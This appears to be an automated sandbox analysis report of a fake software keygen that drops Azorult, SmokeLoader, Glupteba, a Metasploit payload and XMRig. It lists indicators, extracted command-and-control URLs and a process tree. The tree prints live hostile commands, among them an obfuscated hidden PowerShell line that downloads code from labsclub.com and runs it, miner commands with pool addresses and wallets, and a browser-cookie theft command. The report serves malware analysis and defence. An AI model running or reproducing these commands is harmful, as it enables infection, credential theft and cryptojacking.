azorult | 8bce8055e208c7c0fb212a2af6a6232e7a2c7bc81889d75517dd2520dbf10b80

Analysis

max time kernel
300s
max time network
300s
platform
windows10_x64
resource
win10v20201028
submitted
02-04-2021 20:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Active_File_Recovery_Demo_all_serial_code_maker_by_DBC.exe
Size

5.4MB
MD5

b401dc45a17f4b2acf6f9cf7141683c8
SHA1

10a6c5c6dec6ea11f9512e20cc655d53efdb3302
SHA256

45fde52ed17c4165995ac279c880225f5725a83c0426dc57886fbabde8dae637
SHA512

9f2b2049589a06b678ee4672bc6b493be4ac4a783d8b450830a100c439e90ba7bf4e81fff51bc46800a59365f8447cc31f19e1f2d4a22a0b4983ae56fec9f7d8

Score

10^/10

azorult glupteba metasploit smokeloader xmrig backdoor dropper infostealer loader miner trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://labsclub.com/welcome

Extracted

Family

azorult

http://kvaka.li/1210776429.php

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 3 IoCs

resource	yara_rule
behavioral2/memory/5500-235-0x0000000000400000-0x0000000000D24000-memory.dmp	family_glupteba
behavioral2/memory/5500-236-0x0000000005080000-0x000000000598A000-memory.dmp	family_glupteba
behavioral2/memory/5500-239-0x0000000000400000-0x0000000000D24000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 8 IoCs

miner

resource	yara_rule
behavioral2/memory/5916-225-0x00000001402CA898-mapping.dmp	xmrig
behavioral2/memory/5916-222-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral2/memory/5916-233-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral2/memory/5916-257-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral2/memory/8792-788-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral2/memory/6420-803-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral2/memory/8792-970-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral2/memory/6420-988-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig

Executes dropped EXE 11 IoCs

pid	Process
3220	keygen-pr.exe
3224	keygen-step-1.exe
1124	keygen-step-3.exe
652	keygen-step-4.exe
3784	key.exe
492	Setup.exe
1404	key.exe
908	multitimer.exe
1300	setups.exe
3084	askinstall20.exe
1456	setups.tmp

Loads dropped DLL 7 IoCs

pid	Process
1456	setups.tmp
1456	setups.tmp
1456	setups.tmp
1456	setups.tmp
1456	setups.tmp
1456	setups.tmp
1456	setups.tmp

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 12 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
559	ipinfo.io
567	ipinfo.io
141	ipinfo.io
143	ipinfo.io
290	ipinfo.io
359	ip-api.com
546	ipinfo.io
555	ipinfo.io
121	api.ipify.org
182	ip-api.com
284	ipinfo.io
439	api.ipify.org

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3784 set thread context of 1404	3784	key.exe	90

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 42 IoCs

pid	pid_target	Process	procid_target
5576	5276	WerFault.exe	124
4280	5276	WerFault.exe	124
5552	5276	WerFault.exe	124
5876	5276	WerFault.exe	124
6288	5276	WerFault.exe	124
6228	5276	WerFault.exe	124
5188	5276	WerFault.exe	124
7480	4852	WerFault.exe	235
7932	4852	WerFault.exe	235
6952	4852	WerFault.exe	235
7536	4852	WerFault.exe	235
6068	4852	WerFault.exe	235
7908	4852	WerFault.exe	235
1984	4852	WerFault.exe	235
6980	6472	WerFault.exe	179
3656	6472	WerFault.exe	179
2784	6472	WerFault.exe	179
2480	5608	WerFault.exe	149
2952	6472	WerFault.exe	179
8044	6472	WerFault.exe	179
7840	6472	WerFault.exe	179
3144	6472	WerFault.exe	179
4004	6472	WerFault.exe	179
3384	6472	WerFault.exe	179
9116	6472	WerFault.exe	179
8384	6472	WerFault.exe	179
8712	6472	WerFault.exe	179
9152	6472	WerFault.exe	179
7300	7696	WerFault.exe	403
8200	6472	WerFault.exe	179
7880	8540	WerFault.exe	409
7460	7696	WerFault.exe	403
5716	8540	WerFault.exe	409
7668	7696	WerFault.exe	403
5924	8540	WerFault.exe	409
7176	5908	WerFault.exe	450
6100	8540	WerFault.exe	409
5800	7696	WerFault.exe	403
7968	8540	WerFault.exe	409
9184	7696	WerFault.exe	403
8592	8540	WerFault.exe	409
8920	8540	WerFault.exe	409

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
6692	timeout.exe

Kills process with taskkill 4 IoCs

evasion

pid	Process
4332	taskkill.exe
3040	taskkill.exe
3592	taskkill.exe
3260	taskkill.exe

Runs ping.exe 1 TTPs 6 IoCs

Remote System Discovery

T1018

pid	Process
6016	PING.EXE
5788	PING.EXE
6040	PING.EXE
8316	PING.EXE
2244	PING.EXE
804	PING.EXE

Script User-Agent 12 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	286	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	545	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	553	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	558	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	564	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	565	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	142	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	146	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	297	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	552	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	563	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	570	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1456	setups.tmp
1456	setups.tmp

Suspicious use of AdjustPrivilegeToken 35 IoCs

description	pid	Process
Token: SeDebugPrivilege	492	Setup.exe
Token: SeCreateTokenPrivilege	3084	askinstall20.exe
Token: SeAssignPrimaryTokenPrivilege	3084	askinstall20.exe
Token: SeLockMemoryPrivilege	3084	askinstall20.exe
Token: SeIncreaseQuotaPrivilege	3084	askinstall20.exe
Token: SeMachineAccountPrivilege	3084	askinstall20.exe
Token: SeTcbPrivilege	3084	askinstall20.exe
Token: SeSecurityPrivilege	3084	askinstall20.exe
Token: SeTakeOwnershipPrivilege	3084	askinstall20.exe
Token: SeLoadDriverPrivilege	3084	askinstall20.exe
Token: SeSystemProfilePrivilege	3084	askinstall20.exe
Token: SeSystemtimePrivilege	3084	askinstall20.exe
Token: SeProfSingleProcessPrivilege	3084	askinstall20.exe
Token: SeIncBasePriorityPrivilege	3084	askinstall20.exe
Token: SeCreatePagefilePrivilege	3084	askinstall20.exe
Token: SeCreatePermanentPrivilege	3084	askinstall20.exe
Token: SeBackupPrivilege	3084	askinstall20.exe
Token: SeRestorePrivilege	3084	askinstall20.exe
Token: SeShutdownPrivilege	3084	askinstall20.exe
Token: SeDebugPrivilege	3084	askinstall20.exe
Token: SeAuditPrivilege	3084	askinstall20.exe
Token: SeSystemEnvironmentPrivilege	3084	askinstall20.exe
Token: SeChangeNotifyPrivilege	3084	askinstall20.exe
Token: SeRemoteShutdownPrivilege	3084	askinstall20.exe
Token: SeUndockPrivilege	3084	askinstall20.exe
Token: SeSyncAgentPrivilege	3084	askinstall20.exe
Token: SeEnableDelegationPrivilege	3084	askinstall20.exe
Token: SeManageVolumePrivilege	3084	askinstall20.exe
Token: SeImpersonatePrivilege	3084	askinstall20.exe
Token: SeCreateGlobalPrivilege	3084	askinstall20.exe
Token: 31	3084	askinstall20.exe
Token: 32	3084	askinstall20.exe
Token: 33	3084	askinstall20.exe
Token: 34	3084	askinstall20.exe
Token: 35	3084	askinstall20.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1300	setups.exe
1456	setups.tmp

Suspicious use of WriteProcessMemory 52 IoCs

description	pid	Process	procid_target
PID 1144 wrote to memory of 2012	1144	Active_File_Recovery_Demo_all_serial_code_maker_by_DBC.exe	79
PID 1144 wrote to memory of 2012	1144	Active_File_Recovery_Demo_all_serial_code_maker_by_DBC.exe	79
PID 1144 wrote to memory of 2012	1144	Active_File_Recovery_Demo_all_serial_code_maker_by_DBC.exe	79
PID 2012 wrote to memory of 3220	2012	cmd.exe	82
PID 2012 wrote to memory of 3220	2012	cmd.exe	82
PID 2012 wrote to memory of 3220	2012	cmd.exe	82
PID 2012 wrote to memory of 3224	2012	cmd.exe	83
PID 2012 wrote to memory of 3224	2012	cmd.exe	83
PID 2012 wrote to memory of 3224	2012	cmd.exe	83
PID 2012 wrote to memory of 1124	2012	cmd.exe	84
PID 2012 wrote to memory of 1124	2012	cmd.exe	84
PID 2012 wrote to memory of 1124	2012	cmd.exe	84
PID 2012 wrote to memory of 652	2012	cmd.exe	85
PID 2012 wrote to memory of 652	2012	cmd.exe	85
PID 2012 wrote to memory of 652	2012	cmd.exe	85
PID 3220 wrote to memory of 3784	3220	keygen-pr.exe	86
PID 3220 wrote to memory of 3784	3220	keygen-pr.exe	86
PID 3220 wrote to memory of 3784	3220	keygen-pr.exe	86
PID 652 wrote to memory of 492	652	keygen-step-4.exe	87
PID 652 wrote to memory of 492	652	keygen-step-4.exe	87
PID 1124 wrote to memory of 2704	1124	keygen-step-3.exe	88
PID 1124 wrote to memory of 2704	1124	keygen-step-3.exe	88
PID 1124 wrote to memory of 2704	1124	keygen-step-3.exe	88
PID 3784 wrote to memory of 1404	3784	key.exe	90
PID 3784 wrote to memory of 1404	3784	key.exe	90
PID 3784 wrote to memory of 1404	3784	key.exe	90
PID 3784 wrote to memory of 1404	3784	key.exe	90
PID 3784 wrote to memory of 1404	3784	key.exe	90
PID 3784 wrote to memory of 1404	3784	key.exe	90
PID 3784 wrote to memory of 1404	3784	key.exe	90
PID 3784 wrote to memory of 1404	3784	key.exe	90
PID 3784 wrote to memory of 1404	3784	key.exe	90
PID 3784 wrote to memory of 1404	3784	key.exe	90
PID 3784 wrote to memory of 1404	3784	key.exe	90
PID 3784 wrote to memory of 1404	3784	key.exe	90
PID 3784 wrote to memory of 1404	3784	key.exe	90
PID 3784 wrote to memory of 1404	3784	key.exe	90
PID 3784 wrote to memory of 1404	3784	key.exe	90
PID 2704 wrote to memory of 804	2704	cmd.exe	92
PID 2704 wrote to memory of 804	2704	cmd.exe	92
PID 2704 wrote to memory of 804	2704	cmd.exe	92
PID 492 wrote to memory of 908	492	Setup.exe	93
PID 492 wrote to memory of 908	492	Setup.exe	93
PID 492 wrote to memory of 1300	492	Setup.exe	94
PID 492 wrote to memory of 1300	492	Setup.exe	94
PID 492 wrote to memory of 1300	492	Setup.exe	94
PID 652 wrote to memory of 3084	652	keygen-step-4.exe	95
PID 652 wrote to memory of 3084	652	keygen-step-4.exe	95
PID 652 wrote to memory of 3084	652	keygen-step-4.exe	95
PID 1300 wrote to memory of 1456	1300	setups.exe	96
PID 1300 wrote to memory of 1456	1300	setups.exe	96
PID 1300 wrote to memory of 1456	1300	setups.exe	96

C:\Users\Admin\AppData\Local\Temp\Active_File_Recovery_Demo_all_serial_code_maker_by_DBC.exe
"C:\Users\Admin\AppData\Local\Temp\Active_File_Recovery_Demo_all_serial_code_maker_by_DBC.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1144
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2012
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
    keygen-pr.exe -p83fsase3Ge
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3220
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:3784
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
        5⤵
        Executes dropped EXE
        
        PID:1404
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
    keygen-step-1.exe
    3⤵
    - Executes dropped EXE
    PID:3224
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
    keygen-step-3.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1124
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2704
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        5⤵
        Runs ping.exe
        
        PID:804
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
    keygen-step-4.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:652
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:492
    - - C:\Users\Admin\AppData\Local\Temp\KU5SSK7FJ7\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\KU5SSK7FJ7\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        5⤵
        Executes dropped EXE
        
        PID:908
      - C:\Users\Admin\AppData\Local\Temp\KU5SSK7FJ7\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\KU5SSK7FJ7\multitimer.exe" 1 3.1617396956.606784dcde4bb 101
        6⤵
        
        PID:4780
        
        C:\Users\Admin\AppData\Local\Temp\KU5SSK7FJ7\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\KU5SSK7FJ7\multitimer.exe" 2 3.1617396956.606784dcde4bb
        7⤵
        
        PID:4880
        
        C:\Users\Admin\AppData\Local\Temp\mqaniqgbbji\ckwa5r5njh2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\mqaniqgbbji\ckwa5r5njh2.exe" /ustwo INSTALL
        8⤵
        
        PID:5276
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 652
        9⤵
        Program crash
        
        PID:5576
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 668
        9⤵
        Program crash
        
        PID:4280
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 768
        9⤵
        Program crash
        
        PID:5552
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 816
        9⤵
        Program crash
        
        PID:5876
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 876
        9⤵
        Program crash
        
        PID:6288
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 932
        9⤵
        Program crash
        
        PID:6228
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 968
        9⤵
        Program crash
        
        PID:5188
        
        C:\Users\Admin\AppData\Local\Temp\qexhzwbbdg4\xe4jl5w4xd0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\qexhzwbbdg4\xe4jl5w4xd0.exe" /quiet SILENT=1 AF=756
        8⤵
        
        PID:5808
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\qexhzwbbdg4\xe4jl5w4xd0.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\qexhzwbbdg4\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617137443 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"
        9⤵
        
        PID:6296
        
        C:\Users\Admin\AppData\Local\Temp\jsigpk3eda4\IBInstaller_97039.exe
        
        "C:\Users\Admin\AppData\Local\Temp\jsigpk3eda4\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
        8⤵
        
        PID:5600
        
        C:\Users\Admin\AppData\Local\Temp\higtnac13oq\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\higtnac13oq\vpn.exe" /silent /subid=482
        8⤵
        
        PID:5556
        
        C:\Users\Admin\AppData\Local\Temp\jkc0a2z1cc2\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\jkc0a2z1cc2\app.exe" /8-23
        8⤵
        
        PID:5500
        
        C:\Users\Admin\AppData\Local\Temp\r3vmr5djc5p\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\r3vmr5djc5p\vict.exe" /VERYSILENT /id=535
        8⤵
        
        PID:5440
        
        C:\Users\Admin\AppData\Local\Temp\rzhgdxaiw2m\shoigydc4q5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\rzhgdxaiw2m\shoigydc4q5.exe"
        8⤵
        
        PID:5416
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\rzhgdxaiw2m\shoigydc4q5.exe"
        9⤵
        
        PID:4504
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        10⤵
        Runs ping.exe
        
        PID:5788
        
        C:\Users\Admin\AppData\Local\Temp\4izeh0nvbjq\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\4izeh0nvbjq\Setup3310.exe" /Verysilent /subid=577
        8⤵
        
        PID:5368
        
        C:\Users\Admin\AppData\Local\Temp\eapvx31f4ga\kdo1fvx5zev.exe
        
        "C:\Users\Admin\AppData\Local\Temp\eapvx31f4ga\kdo1fvx5zev.exe" /VERYSILENT
        8⤵
        
        PID:5264
        
        C:\Users\Admin\AppData\Local\Temp\qz2ikaxrglk\KiffApp1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\qz2ikaxrglk\KiffApp1.exe"
        8⤵
        
        PID:5244
        
        C:\Users\Admin\AppData\Local\Temp\hadt23mtqf3\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\hadt23mtqf3\cpyrix.exe" /VERYSILENT
        8⤵
        
        PID:5232
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        9⤵
        
        PID:6796
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "{path}"
        10⤵
        
        PID:4956
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "{path}"
        10⤵
        
        PID:2160
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        9⤵
        
        PID:6936
        
        C:\Windows\SysWOW64\at.exe
        
        "C:\Windows\System32\at.exe"
        10⤵
        
        PID:7148
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub
        10⤵
        
        PID:2912
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe
        11⤵
        
        PID:4172
    - - C:\Users\Admin\AppData\Local\Temp\P6LNK3EOTT\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\P6LNK3EOTT\setups.exe" ll
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:1300
      - C:\Users\Admin\AppData\Local\Temp\is-7V7O1.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-7V7O1.tmp\setups.tmp" /SL5="$4011A,635399,250368,C:\Users\Admin\AppData\Local\Temp\P6LNK3EOTT\setups.exe" ll
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:1456
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:3084
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        5⤵
        
        PID:4236
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        6⤵
        Kills process with taskkill
        
        PID:4332
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe"
      4⤵
      PID:5012
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
        5⤵
        
        PID:5108
      - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
        6⤵
        
        PID:4268
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
      4⤵
      PID:2060
    - - C:\Users\Admin\AppData\Roaming\A82C.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\A82C.tmp.exe"
        5⤵
        
        PID:4816
      - C:\Users\Admin\AppData\Roaming\A82C.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\A82C.tmp.exe"
        6⤵
        
        PID:5132
    - - C:\Users\Admin\AppData\Roaming\A9C4.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\A9C4.tmp.exe"
        5⤵
        
        PID:2176
      - C:\Windows\system32\msiexec.exe
        
        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
        6⤵
        
        PID:980
      - C:\Windows\system32\msiexec.exe
        
        -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
        6⤵
        
        PID:5916
    - - C:\Users\Admin\AppData\Roaming\AA61.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\AA61.tmp.exe"
        5⤵
        
        PID:5056
      - C:\Windows\SysWOW64\cmd.exe
        
        /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\AA61.tmp.exe
        6⤵
        
        PID:1232
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 3
        7⤵
        Delays execution with timeout.exe
        
        PID:6692
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
        5⤵
        
        PID:1764
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        6⤵
        Runs ping.exe
        
        PID:6016
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"
      4⤵
      PID:3808
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
      4⤵
      PID:7824
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
      4⤵
      PID:3280
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:6528
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:6884

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:4352

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:4420

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4716

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4868

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:4320

C:\Users\Admin\AppData\Local\Temp\is-M9KLK.tmp\kdo1fvx5zev.tmp
"C:\Users\Admin\AppData\Local\Temp\is-M9KLK.tmp\kdo1fvx5zev.tmp" /SL5="$901E8,2592217,780800,C:\Users\Admin\AppData\Local\Temp\eapvx31f4ga\kdo1fvx5zev.exe" /VERYSILENT
1⤵
PID:5536
- C:\Users\Admin\AppData\Local\Temp\is-D66FK.tmp\winlthsth.exe
  "C:\Users\Admin\AppData\Local\Temp\is-D66FK.tmp\winlthsth.exe"
  2⤵
  PID:5720
- - C:\Users\Admin\AppData\Local\Temp\CyHUdBm2f.exe
    "C:\Users\Admin\AppData\Local\Temp\CyHUdBm2f.exe"
    3⤵
    PID:6920
  - - C:\Users\Admin\AppData\Local\Temp\CyHUdBm2f.exe
      "C:\Users\Admin\AppData\Local\Temp\CyHUdBm2f.exe"
      4⤵
      PID:7012
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
    3⤵
    PID:7648
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
      4⤵
      PID:5228

